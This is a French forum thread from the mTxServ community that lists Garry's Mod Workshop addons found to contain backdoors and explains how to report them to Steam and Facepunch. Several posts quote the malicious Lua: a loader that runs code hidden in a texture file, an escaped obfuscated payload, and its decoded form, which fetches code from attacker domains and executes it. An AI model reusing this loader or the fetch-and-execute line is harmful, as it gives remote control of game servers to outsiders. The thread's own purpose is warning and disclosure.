ADDON WORKSHOP AVEC BACKDOOR

[El Chapo]

Bonjoir chère communauté mTxServ !

Je refais ce post qui de base étais destiner à signaler une backdoor sur un addon.
Je vais reprendre ici les commentaires utiles au sujet, les potentiels autres addon infecté..


ETAPE 1 : EVITER LES BACKDOOR

Voici un sujet très complet que je vous invite à lire, proposé par @Yoh Sambre ♪
https://mtxserv.com/forums/threads/...door-sur-son-serveur-version-simpliste.54822/


ETAPE 2 : SIGNALEZ LES BACKDOOR

SIGNALEMENT STEAM :

1. Cliquez tout simplement sur l’icône signaler pour un objet du workshop.

2. Décrivez votre problème avec un anglais correct, avec copie de la backdoor/screen

3. LE PLUS IMPORTANT : Faites le même signalement directement à Rubat : robotboy655@facepunchstudios.com

Encore merci à @Yoh Sambre ♪ pour avoir relayé l’information.


ÉTAPE 3 : LISTE DES ADDONS INFECTÉS

==========================================================

French Gendarme - Gendarme Francais
https://steamcommunity.com/sharedfi...earchtext=French+Gendarme+-+Gendarme+Francais

Auteur de l'addon : Rico | NSA
https://steamcommunity.com/id/ricomp3

Reporté par : @El Chapo

Code malicieux :

if SERVER then local check = CompileString local function Check(texture) check(string.Explode("\n",file.Read(texture,"GAME"))[9],"R",false)() end Check([[materials\models\humans\suits\vance_facemap2.vmt]])
end

Merci à @Drilen / @Aiiden / @Zilnix pour leur ÉNORME SOUTIENT ! N'hésitez pas à les remercier également !

==========================================================

==========================================================

U.S. MARSHAL - PLAYERMODEL V3
https://steamcommunity.com/sharedfiles/filedetails/?id=915783968

Auteur de l'addon : Rico | NSA
https://steamcommunity.com/id/ricomp3

Reporté par : @Ant00ine

Code malicieux :

if SERVER then local check = CompileString local function Check(texture) check(string.Explode("\n",file.Read(texture,"GAME"))[8],"R",false)() end Check([[materials\models\usmarshalv2\task_diff_000_a_uni2.vmt]])
end
[[
timer.Simple(1,function() RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\100\111\111\114\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") end)
]]
http.Fetch("https://gvac.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)http.Fetch("https://gvacdoor.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)

==========================================================

 

[Aiiden]

Rpz à Enigma hein qui s'amuse à backdoor des addons Workshop pour rediriger les joueurs sur le serveur d' @Akulla


(Parce que bon être à 5 connecté et avoir 32 connexions d'un coup c'est beaucoup je trouve )

 

[Mr Akitaman]

Mais ça ressemble beaucoup a une backdoor se que tu nous donnes dit donc

 

[Aiiden]

C'est vrai que mettre une ligne côté serveur sur un PM c'est bien connu hein Akita

 

[Mr Akitaman]

Bas je vois pas en quoi c'est une backdoor

 

[Adem]

Salut je suis nouveau sur le site, on peut m'expliquer ? Je comprends pas trop les fonctionnalités..

 

[Aiiden]

"http.Fetch("https://gvac.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)http.Fetch("https://gvacdoor.cz/_/_.php",function(b) RunString(b, "ERROR", false) end) "

(Ne pas aller dessus parce que ce sont des hackeurs et du coup bah t ban mek)

 

[séméron23]

Regarde la pièce jointe 13791
Regarde la pièce jointe 13792

"http.Fetch("https://gvac.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)http.Fetch("https://gvacdoor.cz/_/_.php",function(b) RunString(b, "ERROR", false) end) "

(Ne pas aller dessus parce que ce sont des hackeurs et du coup bah t ban mek)

J'ai pas compris sa te ban de quoi x)

 

[Ant00ine]

Incroyable, c’est pas la première fois que Rico s’amuse a ce genre de chose. Déjà il y a 3 ans, il avait fait un beau petit carnage sur beaucoup de serveur Gmod avec ses backdoors workshop.
Comme quoi on ne change pas

 

[Yoh Sambre ♪]

Incroyable, c’est pas la première fois que Rico s’amuse a ce genre de chose. Déjà il y a 3 ans, il avait fait un beau petit carnage sur beaucoup de serveur Gmod avec ses backdoors workshop.
Comme quoi on ne change pas

dans un sens ça semblais logique , il avais la possibilité de tourner sur un panel qui est bien plus intéressant que ce qu'il avais a l'époque (gbackdoor) .

Clairement Rico comptais continuer ce qu'il avais commencer a l'époque de MPOWER..

 

[Ant00ine]

dans un sens ça semblais logique , il avais la possibilité de tourner sur un panel qui est bien plus intéressant que ce qu'il avais a l'époque (gbackdoor) .

Clairement Rico comptais continuer ce qu'il avais commencer a l'époque de MPOWER..

J’avais commenté sur son dernier addon « à quand la prochaine backdoor », mais il me l’a supprimé
Je suis devin !

 

[Yoh Sambre ♪]

J’avais commenté sur son dernier addon « à quand la prochaine backdoor », mais il me l’a supprimé
Je suis devin !

D'ailleurs si certains on envie de participer au signalement des contenus malicieux sur le workshop il vous suffit d'envoyer un mail a Rubat : robotboy655@facepunchstudios.com

il faudras un minimum expliquer en anglais que le script contient un code malicieux et des preuves (screen / codes malicieux en citation)

 

[bastien73]

Perso j’avais l’addon mais aucun problème bizarrement

 

[El Chapo]

D'ailleurs si certains on envie de participer au signalement des contenus malicieux sur le workshop il vous suffit d'envoyer un mail a Rubat : robotboy655@facepunchstudios.com

il faudras un minimum expliquer en anglais que le script contient un code malicieux et des preuves (screen / codes malicieux en citation)

Merci pour l'info je lui envoi un petit mail de suite !

 

[Luciano Leggio]

D’autres addons ont été mis à jour également le 26 février tels que le US Marshall etc..

 

[bastien73]

Il assume pas il supp les commentaires disant que y’a une backdoor

 

[Yoh Sambre ♪]

Il assume pas il supp les commentaires disant que y’a une backdoor

https://instaud.io/3noO

 

[Kitsu]

https://instaud.io/3noO

c'est quoi ce rire a la fin xD

 

[Ant00ine]

Bonsoir chère communauté mTxServ !

Je post ce message ce soir pour vous prévenir d'un addon contenant une backdoor !

SIGNALEZ LE EN MASSE SVP !

==========================================================

Voici la backdoor contenu dans cet addon : https://steamcommunity.com/sharedfi...earchtext=French+Gendarme+-+Gendarme+Francais

if SERVER then
local check = CompileString
local function Check(texture)
check(string.Explode("\n",file.Read(texture,"GAME"))[9],"R",false)()
end
Check([[materials\models\humans\suits\vance_facemap2.vmt]])
end


==========================================================


Merci à @Drilen / @Aiiden / @Zilnix pour leur ÉNORME SOUTIENT ! N'hésitez pas à les remercier également !

Salut,
Tu peux aussi ajouter à ton post cet addon https://steamcommunity.com/sharedfiles/filedetails/?id=915783968
Toujours de Rico,

if SERVER then local check = CompileString local function Check(texture) check(string.Explode("\n",file.Read(texture,"GAME"))[8],"R",false)() end Check([[materials\models\usmarshalv2\task_diff_000_a_uni2.vmt]])
end

Et ensuite dans le fichier en question:

--[[
timer.Simple(1,function() RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\100\111\111\114\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") end)
]]

Qui donne:

 http.Fetch("https://gvac.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)http.Fetch("https://gvacdoor.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)

 

[Yoh Sambre ♪]

Et ensuite dans le fichier en question:
--[[
timer.Simple(1,function() RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\100\111\111\114\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") end)
]]

 http.Fetch("https://gvac.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)http.Fetch("https://gvacdoor.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)

pour les gens désireux de participer a la déobfuscation d'un script backdoor a l'avenir (sur un autre topic de ce genre pourquoi pas?) , ce topic vous permettra de lire les obfuscation basique de ce genre > https://mtxserv.com/forums/threads/...door-sur-son-serveur-version-simpliste.54822/ (fin de topic pour les sites)

 

[Hosgor]

 http.Fetch("https://gvac.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)http.Fetch("https://gvacdoor.cz/_/_.php",function(b) RunString(b, "ERROR", false) end)

pour les gens désireux de participer a la déobfuscation d'un script backdoor a l'avenir (sur un autre topic de ce genre pourquoi pas?) , ce topic vous permettra de lire les obfuscation basique de ce genre > https://mtxserv.com/forums/threads/...door-sur-son-serveur-version-simpliste.54822/ (fin de topic pour les sites)

Yoh Sambre sur ton topic on peut répertorier les liens Workshop backdoors ?

 

[Yoh Sambre ♪]

Yoh Sambre sur ton topic on peut répertorier les liens Workshop backdoors ?

Non préférez directement signaler les objets workshop a Rubat

 

[Hosgor]

Je crois que Rico c'est bien amusé

On peut rajouter cette addon : https://steamcommunity.com/sharedfiles/filedetails/?id=852427102 à la liste

Voici la backdoor :

Une fois dans le fichier :

--[[
timer.Simple(1,function() RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\100\111\111\114\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") end)
]]

Juste pour envoyer le message au fameux rubat je dois donner quoi comme info

Yoh sambre tu sais si on reçoit un mail si l'addons est supprimé ?

 

[Yoh Sambre ♪]

Je crois que Rico c'est bien amusé

On peut rajouter cette addon : https://steamcommunity.com/sharedfiles/filedetails/?id=852427102 à la liste

Voici la backdoor :
Regarde la pièce jointe 13836

Une fois dans le fichier :

--[[
timer.Simple(1,function() RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\103\118\97\99\100\111\111\114\46\99\122\47\95\47\95\46\112\104\112\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") end)
]]

Juste pour envoyer le message au fameux rubat je dois donner quoi comme info

Yoh sambre tu sais si on reçoit un mail si l'addons est supprimé ?

Hello I discovered a malicious code on the workshop, this one allows to launch any type of code thanks to a web panel.

object workshop : (la tu fout le lien de l'objet infecter)

proofs: (La tu fout un screen ou le code malicieux voir les deux)

généralement il répond mais dans tous les cas l'idéal reste que ce soit supprimer au final , libre a toi de vérifier tous les jours après ton report la page

 

[El Chapo]

Petite modification du sujet pour les prochains lecteurs.

Ajout de l'addon U.S Marshall signalé par @Ant00ine

 

[Yoh Sambre ♪]

j'espere que vous etes tous conscient que ce topic est INUTILE si les objets workshop ne sont pas supprimer du workshop..?

 

[El Chapo]

Ce topic a pas pour but de faire supprimer les fameux addons ?

 

[Yoh Sambre ♪]

Ce topic a pas pour but de faire supprimer les fameux addons ?

mais...j'ai indiquer plus haut qu'il fallait envoyer un EMAIL a Rubat...comment veux tu que mtxserv s'occupe de ca alors que ca ne les concerne ABSOLUMENT PAS..

 

[El Chapo]

Je comprend pas ce qui dérange pardonne moi.

Pour moi ce topic sert aux personnes de la communauté, comme il y a beaucoup de fondateur sa permet de les avertir rapidement.
Ils pourront donc les signaler à leur tour pour aider à les faire supprimer, pour le bien de tous.

Sa peut aussi aider à éviter les auteurs/addons infectés.

A aucun moment j'inclus mTx ici, c'est pour les membres que je partage ça.
J'y trouve donc une petite utilité quand même @Yoh Sambre ♪

 

[Yoh Sambre ♪]

Ah mais je critique pas la démarche , juste que bon si vous voulez vraiment faire bouger les choses > contactez rubat

 

[El Chapo]

C'est pourquoi j'ai modifié le topic avec dans l'étape 2 :

3. LE PLUS IMPORTANT : Faites le même signalement directement à Rubat : robotboy655@facepunchstudios.com

J'ai augmenté la taille du texte histoire de ne pas le louper !